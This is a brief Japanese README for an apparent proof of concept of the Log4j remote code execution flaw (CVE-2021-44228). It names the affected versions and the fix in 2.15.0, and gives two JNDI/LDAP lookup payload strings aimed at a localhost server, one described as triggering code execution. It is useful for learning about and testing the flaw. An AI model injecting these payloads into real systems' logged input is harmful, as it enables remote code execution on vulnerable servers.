
Log4j-RCE (CVE-2021-44228) 概念実証と追加情報
これはlog4jのRCEの概念実証です。
CVE-2021-44228に関するリンクはこちら:
このバグはほぼすべてのlog4j2とおそらくlog4j1のバージョンに影響します。推奨バージョンは、このエクスプロイトを修正した**2.15.0**です。
${jndi:ldap://127.0.0.1/e}を貼り付けます。ポート389で開いているソケットがある場合、logj4は接続を試み、タイムアウトが発生するまでそれ以上の通信をブロックします。THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!が記録されます。これはLDAPサーバーからのシリアライズされた文字列オブジェクトです。
${jndi:ldap://127.0.0.1/exe}を貼り付けます。-Dcom.sun.jndi.ldap.object.trustURLCodebase=trueがtrueに設定されている場合、リモートコード実行が発生します。
このプロジェクトは教育目的のみです。